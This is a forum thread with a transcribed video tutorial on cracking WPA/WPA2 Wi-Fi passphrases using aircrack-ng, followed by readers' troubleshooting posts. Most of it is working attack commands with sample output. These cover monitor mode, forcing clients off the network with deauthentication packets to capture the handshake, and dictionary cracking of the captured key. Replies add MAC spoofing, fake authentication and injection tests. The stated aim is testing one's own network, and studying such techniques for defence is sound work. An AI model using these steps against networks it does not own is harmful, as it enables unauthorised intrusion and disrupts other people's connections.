-=Xploitz=- VIDEO: Volume #3 "E-Z WPA/WPA2 Cracking Tutorial"

[{In}Secure]

Here is my submission of Xploitz WPA cracking vid #3.

I was to lazy to re-type all of it so I took some screenshots during the video, printed them, and then used an OCR program to create the txt file.
Enjoy.

[-=Xploitz=-]

Here is my submission of Xploitz WPA cracking vid #3.

I was to lazy to re-type all of it so I took some screenshots during the video, printed them, and then used an OCR program to create the txt file.
Enjoy.

Nice. Thanks for taking the time to do that. There were a few errors within the transcript. Mainly because the OCR program that was used mixed up the number 1 with the letter l..and vice versa..and the number 0 for a Q like ath0 was turned into athQ. I however demand accuracy with my tutorials...

So here is my edited and revised copy of this transcript, not for download..but for online viewing. Feel free though to copy and paste it to Windows notepad or Linuxs' KWrite. Thanks again {In}Secure for posting.

Code:

-=Xploitz=- E-Z Video Tutorial: Cracking WPA/WPA2
Date of video:  August 09,   2007

    
Hello everyone,   : )

Welcome once again to another great  E-Z VIDEO Tutorial taught
 to you by your newly appointed  remote-exploit.org Moderator,
 me....-=Xploitz=-

This time were gonna step it up a little bit and try our hand at our
WPA/WPA2 TKIP or TKIP+AES network, Whats the difference 
between cracking a WPA network -VS- a WPA2 network??
Answer. , .ABSOLUTELY NOTHING!! There is no difference between
cracking WPA or WPA2 networks at all. In order to SUCCESSFULLY
crack any WPA/WPA2 network, there are 2 main key things that
must happen. (1) YOU MUST CAPTURE THE FULL 4 WAY
HANDSHAKE!! AIRODUMP-NG WILL LET YOU KNOW BY TELLING
YOU. IF YOU LOOK AT THE TOP RIGHT HAND CORNER OF YOUR
AIRODUMP-NG SCREEN IT WILL REGISTER AND LET YOU KNOW BY
SAYING " [ WPA handshake: 00:18:F8;B5:F2:D6] (2) YOUR
PASSPHRASE MUST BE IN THE DICTIONARY YOU CHOSE IN 
ORDER TO SUCCESSFULLY BRUTE FORCE IT WITH AIRCRACK-NG.

***SPECIAL NOTE!!!*** 
IF YOUR NETWORK IS ENCRYPTED WITH WPA/WPA2 +AES.....
COWPATTY WILL NOT WORK. COWPATTY ONLY WORKS 
WITH TKIP.Thats why I'm using aircrack-ng to crack my 
WPA2/TKIP+AES network, NOW THAT THATS BEEN SAID,
...LETS BEGIN SHALL WE??


First off, we're gonna put our interface into monitor mode.
To accomplish this we type in...

airmon-ng stop <device>

My device is Atheros chipped so it would like,.,

airmon-ng stop ath0

Next, we type in,

airmon-ng start <device>,

Again, my card is an Atheros chipped card so I'll use ath0 to
place my ath0 interface into monitor mode, Other devices
may only be required to use eth0, wlan0 etc... So for mine its. . .

airmon-ng start ath0

Start airodump-ng to collect the authentication handshake.
 If you don't  know your networks details, just type  in...,

airodump-ng <device> 

mine will look like... 
airodump-ng ath0

After you run airodump and you see your network and 
its connected client(s),

press ^c   (Thats Ctrl  c) 

 This action will  break you out of airodumps process and 
give you a new command line.  Use this when you want to
 switch back and fourth to copy and paste your networks details.

Now, open a new shell window and fill in all your networks
info so that we can focus on only your network and lock
onto it,  To do this you'll type...

airodump-ng -c (Channel  your AP is on) -w (file name) --bssid (your APS bssid here) <device>

Mine looks like...

airodump-ng -c 6 -w psk --bssid 00:18:F8:B5:F2;D6 ath0

***Important***Do NOT use the --ivs option. 
 You must capture the full packets!


Use Aireplay-ng to de-authenticate the wireless client

To accomplish this we type in...

aireplay-ng -0 1 -a <AP MAC> -c <Clients MAC> <Device>.

Mine looks like this...
    
aireplay-ng -0 1 -a 00:18:F8:B5:F2:D6 -c 08:14:A5:F6:83:E3 ath0

You'll know your attack was successful!, if your 
airodump-ng screen looks similar to this,..

CH 6 H Elapsed: 2 mins ][-08-08 14:37][ WPA handshake 00:18:F8:B5:F2:D6]

BSSID            PWR RXO    Beacons    #Data    #/s    CH    MB    ENC CIPHER AUTM ESSID

E0:18:F8:B5:F2:D6      68    1298    645    3      6     48    WPA2 CCMP  PSK     XploitZ

BSSID            STATION            PWR    Rate Lost Packets Probes

00:18:F8:B5:F2:D6     08:14:A5:F6:83:E3      56     54-54  0    1019


Notice the *[ WPA handshake: 00:18:F8:B5:F2:D6] in the upper
 part of the above text?? This confirms that you have captured 
the complete 4 way handshake, ;)

***IMPORTANT NOTE!!***
If there is not a client connected, and you suspect there
 is one connected,.just type in 

aireplay-ng -0 1 -a <BSSID> <Device> 

And they'll appear if their connected!


OPEN A NEW SHELL

Run aircrack-ng to crack the pre-shared key,
To do this we type in the command...,

aircrack-ng -w password.lst -b <AP's BSSID HERE> filename.cap

Mine looks like this,..

aircrack-ng -w algae.txt -b 00:18:F8:B5:F2:D6 psk*.cap

  You can use .txt or .lst dictionaries. It doesn't matter which
type of dictionary you use. Just make sure if your dictionary is
called passwords.lst, you type in passwords.lst and not .txt. 
Also, your pass-phrase MUST BE IN THE DICTIONARY FOR
THIS ATTACK TO WORK!! Also please note that my dictionary
is located in my home folder or /root directory, therefore there is
no need to type in the full path to my dictionary;} There are 
other methods including the use of a pre-compiled list of 
passwords with your ESSID, but this particular tutorial will NOT 
cover it. I will do another video explaining step by step all the 
correct processes you need to build a database and pre-compile
 it with your ESSID and password list in the very near future.

[wil007]

It's ok

card : Alfa AWUS036H
chipset : rtl8187

Unplug alpha
BootVMware

Code:

cd rtl8187_linux_26.1010.0622.2006
sh wlan0up

plug alpha

Code:

sh wlan0up
macchanger --mac 00:11:22:33:44:55 wlan0
airmon-ng start wlan0 1
airodump-ng -c 1 -w psk --bssid [BSSID_AP] wlan0

New shell

Code:

aireplay-ng -0 1 -a [BSSID_AP] -c [BSSID_CLIENT] wlan0

Sending DeAuth to station -- STMAC : [[BSSID_CLIENT]]

but no handshake

PWR : about 50
CH : 1
ENC : WPA
CLIPHER : TKIP
AUTH : PSK
ESSID : AOLbox***

[-=Xploitz=-]

try doing -0 5 instead of -0 1 in your deauth command. Your close to the AP and the client correct? You MUST BE CLOSE TO BOTH..not just the AP..its different than in cracking WEP... where you only need to be close to the AP.

BTW...why are you using macchanger for WPA/WPA2??? Its not needed since your not using your card to connect or associate/authenticate with the AP.

[wil007]

I reach 60 at the maximum PWR for the AP
I reach 35 at the maximum PWR for the CLIENT

If i use an other card on windows XP and i try to connect to the AP,on VMware I can see an other client (me) with a power -1. But the command

Code:

aireplay-ng -0 1 -a [BSSID_AP] -c [MY_BSSID_CLIENT] wlan0

gives nothing

I tried -0 0 too

EDIT : i have already try 1.0-dev but i was farther when i try 1.0-dev
I will try again

[-=Xploitz=-]

Have you updated to the most recent version of aircrack??

svn co http://trac.aircrack-ng.org/svn/trunk/ aircrack-ng
cd aircrack-ng
make
make install

[wil007]

I tried both version aircrack

With 1.0dev, instead of

Code:

[ WPA handshake 00:18:F8:B5:F2:D6] (in your tuto)

i can note this message

Code:

[ 140bytes keystream :[BSSID_AP]

[-=Xploitz=-]

Don't use 1.0 dev for this..use my posted svn co http://trac.aircrack-ng.org/svn/trunk/ aircrack-ng

I say use that because there was an issue with the aircrack-ng dictionary capitals and special letters not working out right..example..my passphrase was -=Xploitz=-...I had -=Xploitz=- in my dictionary...but because of the -==- in my passphrase..aircrack dev 1.0 wouldn't read it right. So please use the above version instead. Don't know if it will fix your problem or not..but its worth a shot.

Do me a favor..test to see if your on the same channel as the AP. Right before you enter your aireplay-ng -0 1 ..etc...command..do a ifconfig wlan0 and a iwconfig wlan0 to verify your on the same channel. Im starting to run out of solutions to help you. Have you updated your cards drivers as well??

Try to see if your card is capable of injecting...

aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80 -i wlan0 ath0
Where:

• -9 means injection test. Long form is - -test. (Double dash)
• -e teddy is the network name (SSID). This is optional.
• -a 00:14:6C:7E:40:80 ath0 is MAC address of the access point (BSSID). This is optional.
• -i wlan0 is interface name of the second card if you want to determine which attacks your card supports. This is optional.
• ath0 is the interface name or airserv-ng IP Address plus port number. For example - 127.0.0.1:666. (Mandatory)

IMPORTANT: You must set your card to the desired channel with airmon-ng prior to running any of the tests.

[wil007]

First,i think i have already the best version of aircrack.
Mine is in /modules/aircrack_0.91.lzm
On the page:

Code:

h ttp://forums.remote-exploit.org/showthread.php?t=6784

i have the version of 25/Jun/2007
I have to download this version ?:

Code:

svn co h ttp://trac.aircrack-ng.org/svn/trunk/ aircrack-ng

Secondly,i do the test :

Code:

airmon-ng star wlan0 1
aireplay-ng -9 wlan0

Code:

00:14:6C:7E:40:80 - chennel 1  - "teddy "
Ping  : 2ms/25/49
28/30 93%

EDIT : I will try the lastest version of my alpha (*Update 26/Jun/2007)

EDIT2 : I have an interrogation Xploitz.
When I type

Code:

aircrack-ng -w pass psk*.cap

i can see:

Code:

Encryption
WEP (**IVs)

But it's a WPA key for airodump-ng. Have you got an explication ?
thanks

EDIT3 : so i tryto do

aireplay-ng -1 1 -e teddy -a [AP_BSSID] -h [CLIENT_BSSID] wlan0

but, i have something like that :

8:28:02 Sending Authentication Request
18:28:02 Authentication successful
18:28:02 Sending Association Request
18:28:02 Association successful :-)
18:28:02 Got a deauthentication packet!
18:28:05 Sending Authentication Request
18:28:05 Authentication successful
18:28:05 Sending Association Request
18:28:10 Sending Authentication Request
18:28:10 Authentication successful
18:28:10 Sending Association Request

I don't think that is good

EDIT4 :
With the latest version for alpha end aircrack 0.9.1svn499 :

Code:

aircrack-ng -w pass psk*.cap

i can see:

Code:

Encryption
WAP (0 handshake)

it's better than WEP (**IVs)

[l0gaN]

-=Xploitz=-

WOW, this is a great video. I am a noobie, and for me it was wonderful. very clear and concise.

The one thing i was a little off about was having to have my WPA Key in the password list. Wouldn't that defeat the purpose of really testing a network? I want to test my network or a clients network but if i already knew their passcode then it is like "cheating"

have you done a video fo try to crack a WPA without knowing the passcode?

Either way, your tuts are always very easy for me to follow

thank you. keep up the awesome work.